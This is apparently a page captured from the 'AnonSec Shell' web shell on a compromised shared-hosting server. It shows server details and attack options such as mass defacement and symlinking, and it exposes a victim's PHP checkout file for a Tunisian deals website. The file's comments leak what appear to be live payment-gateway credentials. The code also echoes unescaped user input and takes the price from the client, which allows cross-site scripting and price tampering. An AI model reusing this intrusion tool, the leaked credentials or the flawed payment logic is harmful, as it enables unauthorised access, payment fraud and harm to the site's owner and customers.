. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.146   [ Reverse IP ]
Web Server : Apache
System : Linux webm002.cluster103.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : dealkatnwc ( 662330)
PHP Version : 7.0.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/dealkatnwc/www/wp-custom/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/dealkatnwc/www/wp-custom/enligne.php
<style>header.entry-header{display: none;}</style>
<style>.asteriskField{color: red;} .input-group{margin: 5px;} .input-group-addon{width: 44%;text-align: left;} </style>

<?php
if (!( isset($_POST['deal_id']) )) {echo "<script>document.location.href='".get_bloginfo('url')."/404.php/?erreur=1';</script>";}
if (!( is_user_logged_in() ))  {echo "<script>document.location.href='".get_bloginfo('url')."/404.php/?erreur=2';</script>";}
if (get_post_type( $_POST['deal_id'] ) != 'deal')  {echo "<script>document.location.href='".get_bloginfo('url')."/404.php/?erreur=3';</script>";}
if (get_post_meta( $_POST['deal_id'], 'wpcf-date-d-expiration', true ) < time())  {echo "<script>document.location.href='".get_bloginfo('url')."/404.php/?erreur=4';</script>";}

global $current_user;
get_currentuserinfo();

$titre = get_the_title($_POST['deal_id']);
$prix_promo = get_post_meta( $_POST['deal_id'], 'wpcf-prix-promo', true );
?>
<h1>Votre commande</h1>

<table class="table table-bordered">
    <thead>
        <tr>
            <th width="25%">Produit</th>            <th width="50%">Offre</th>            <th width="10%">Quantité</th>            <th width="15%">Prix</th>
        </tr>
    </thead>
	
    <tbody>
        <tr>
            <td>
			   <div class="img-hover" scope="row">
				<?php echo '<img src="'.wp_get_attachment_url( get_post_thumbnail_id($_POST['deal_id']) ).'" class="img-responsive" alt="">';?>	                  		
			    </div>
			</td>
            <td><a href="<?php  echo get_page_link($_POST['deal_id']);?>" target="_blanc"><?php echo $titre;?></a></td>            <td><?php echo $_POST['quantite']; ?></td>
            <td><?php echo $prix_promo;?><sup>DT</sup></td>
            
        </tr>
    </tbody>

	<tbody>
		<tr class="text-center">
			<th scope="row" colspan="3" class="text-center">Total</th>
			<td ><b><?php echo $prix_promo * $_POST['quantite'];?></b><sup>DT</sup></td>
		</tr>
	</tbody>	
</table>	
<?php
////on insérer dans la commande 
global $wpdb;
$orderID=time();				 
$test = false;
 // tester que le numéro de cmd est unique
while($test == false)
{$nb = $wpdb->get_var("SELECT COUNT(*) FROM {$wpdb->prefix}coupons WHERE code_cmd = '".$orderID."' ");if ($nb==0) {$test = true;} else {$orderID++;}}

$wpdb->insert($wpdb->prefix.'coupons', array(  'id' => NULL,
												'code_cmd' => $orderID,
												'deal_id' => $_POST['deal_id'],
												'id_vendeur' => 0,
												'dealer_nom' => $_POST["dealer_nom"],
												'dealer_prenom' => $_POST["dealer_prenom"],
												'dealer_tel' => $_POST["dealer_tel"],
												'dealer_sex' => $current_user->gender,
												'dealer_gouv' => $current_user->gouvernorat,
												'dealer_email' => $_POST["dealer_email"],
												'date_coupon' => $orderID,	
												'quantite' => $_POST["quantite"],
												'etat' => 0,
												'mailing' => 0,
												'recu' => 0),
										array( '%d', '%d', '%d','%d', '%s', '%s', '%s', '%s', '%s', '%s', '%d', '%d', '%d', '%d', '%d' ) );



$retour = session_id();
// $action = 'https://preprod.gpgcheckout.com/Paiement_test/Validation_paiement.php';
$action = 'https://www.gpgcheckout.com/Paiement/Validation_paiement.php';
$NumSite =GPG_NumSite;  //MAR303
$Password=GPG_Password; //kz_lyH41
$orderID=$orderID;  //time()
$Amount= (int) $_POST['prix'] * $_POST["quantite"] * 1000;    		// $_POST['$quantity'] *  $_POST['$prix']
$Currency='TND';           //TND
$Language='fr';        //fr
$EMAIL=$_POST['dealer_email'];               // $_POST['$dealer_email']
$CustLastName=$_POST['dealer_nom'];         // $_POST['$dealer_nom']
$CustFirstName=$_POST['dealer_prenom'];    // $_POST['$dealer_prenom']
$CustAddress=$current_user->address;    //$current_user->address
$CustZIP=$current_user->code_postale;   //$current_user->code_postale
$CustCity=$current_user->gouvernorat;       //$current_user->ville
$CustCountry='Tunisie';    // Tunisie
$CustTel=$_POST['dealer_tel'];  // $_POST['$dealer_tel']
$PayementType='1';   //
$MerchandSession=$retour;
$orderProducts=$titre;   //$_POST['prod_titre']
if ($_POST["quantite"] > 1) {$orderProducts = $_POST["quantite"]." X ".$orderProducts;} 
// $signature=sha1($NumSite+$Password+$orderID+$Amount+$devie);
$signature = sha1($NumSite.$Password.$orderID.$Amount.$Currency);

$vad= GPG_CodeVad;
$Terminal='001';
$TauxConversion='';										
////////

echo "
<FORM name='paiment' method='POST' action='".$action."'>
<input type='hidden' name='NumSite' value='".$NumSite."'>
<input type='hidden' name='Password' value='".md5($Password)."'>
<input type='hidden' name='orderID' value='".$orderID."'>
<input type='hidden' name='Amount' value='".$Amount."'>
<input type='hidden' name='Currency' value='".$Currency."'>
<input type='hidden' name='Language' value='".$Language."'>
<input type='hidden' name='EMAIL' value='".$EMAIL."'>
<input type='hidden' name='CustLastName' value='".$CustLastName."'>
<input type='hidden' name='CustFirstName' value='".$CustFirstName."'>
<input type='hidden' name='CustCountry' value='".$CustCountry."'>
<input type='hidden' name='CustTel' value='".$CustTel."'>
<input type='hidden' name='PayementType' value='".$PayementType."'>
<input type='hidden' name='MerchandSession' value='".$MerchandSession."'>
<input type='hidden' name='orderProducts' value='".$orderProducts."'>
<input type='hidden' name='signature' value='".$signature."'>
<input type='hidden' name='vad' value='".$vad."'>
<input type='hidden' name='Terminal' value='".$Terminal."'>
<input type='hidden' name='TauxConversion' value='".$TauxConversion."'>

<input type='hidden' name='AmountSecond' value=''>
<input type='hidden' name='BatchNumber' value=' '>
<input type='hidden' name='MerchantReference' value=' '>
<input type='hidden' name='Reccu_Num' value=''>
<input type='hidden' name='Reccu_ExpiryDate' value=''>
<input type='hidden' name='Reccu_Frecuency' value=' '>
";
?>








<div class="panel panel-default">
  <div class="panel-heading text-center"><b>Vos Information</b></div>
  <div class="panel-body">
		 <div class="row">
		   <div class="col-md-9 col-sm-9 col-xs-12">
			

			 
			 <div class="input-group  col-xs-12">
			  <span class="input-group-addon">Adresse <span class="asteriskField">*</span></span>
			  <input type="text" class="form-control" id="CustAddress" name="CustAddress" placeholder="" aria-label="Adresse" value='<?php echo $CustAddress;?>' pattern='^[a-zA-Zéèàîìôòùû0-9 ]{3,100}$' title='L`adresse doit être composer des lettres et des chiffres de taille varie entre 4 et 100 carractére' required>
			  <label class="control-label requiredField" for="CustAddress"></label>
			</div>
			  
			 <div class="input-group  col-xs-12">
			  <span class="input-group-addon">Code Postale <span class="asteriskField">*</span></span>
			  <input type="text" class="form-control" id="CustZIP" name="CustZIP" placeholder="" aria-label="Code Postale" value='<?php echo $CustZIP;?>' pattern='^[0-9]{4}$' title='Le code postale doit être composer de 4 chiffres.' required>
			  <label class="control-label requiredField" for="CustZIP"></label>
			</div>
			
			 <div class="input-group  col-xs-12">
			  <span class="input-group-addon">Gouvernorat <span class="asteriskField">*</span></span>
			  <select id="CustCity" name="CustCity" aria-label="Gouvernorat" class="form-control" required>
				<option  value="Ariana">Ariana</option>
				<option  value="Beja">Beja</option>
				<option  value="Ben Arous">Ben Arous</option>
				<option  value="Bizerte">Bizerte</option>
				<option  value="Gabes">Gabes</option>
				<option  value="Gafsa">Gafsa</option>
				<option  value="Jendouba">Jendouba</option>
				<option  value="Kairouan">Kairouan</option>
				<option  value="Kasserine">Kasserine</option>
				<option  value="Kebili">Kebili</option>
				<option  value="Kef">Kef</option>
				<option  value="Mahdia">Mahdia</option>
				<option  value="Manouba (La)">Manouba (La)</option>
				<option  value="Medenine">Medenine</option>
				<option  value="Monastir">Monastir</option>
				<option  value="Nabeul">Nabeul</option>
				<option  value="Sfax">Sfax</option>
				<option  value="Sidi Bouzid">Sidi Bouzid</option>
				<option  value="Silana">Silana</option>
				<option  value="Sousse">Sousse</option>
				<option  value="Tataouine">Tataouine</option>
				<option  value="Tozeur">Tozeur</option>
				<option  value="Tunis">Tunis</option>
				<option  value="Zaghouan">Zaghouan</option>
			  </select>
			  <script>document.getElementById("CustCity").value = "<?php echo $CustCity; ?>";</script>
			  
			  <label class="control-label requiredField" for="CustCity"></label>
			</div>
		



	 
			</div>
	        <div class="col-md-3 col-sm-3 col-xs-12 text-center">
			 <img src="<?php echo get_template_directory_uri(); ?>/images/paiement-securise.png" class="img-responsive"   alt="">
		   </div>
		  </div>
   
  </div>
  <div class="panel-footer">
  <div class="row">

		<div class="col-md-6 col-sm-6 col-xs-12 text-right  pull-right">
         	<button class="btn btn-primary " name="submit" type="submit">
				<i class="fa fa-credit-card"></i> Payer
			</button>
		</div>
		
		<div class="col-md-6 col-sm-6 col-xs-12 text-left">
		<a href="<?php  echo get_page_link($_POST['deal_id']);?>"><i class="fa fa-long-arrow-left"></i> Retour</a>
		</div>

  </div>
  </div>
  </div>	
</form>

Anon7 - 2022
AnonSec Team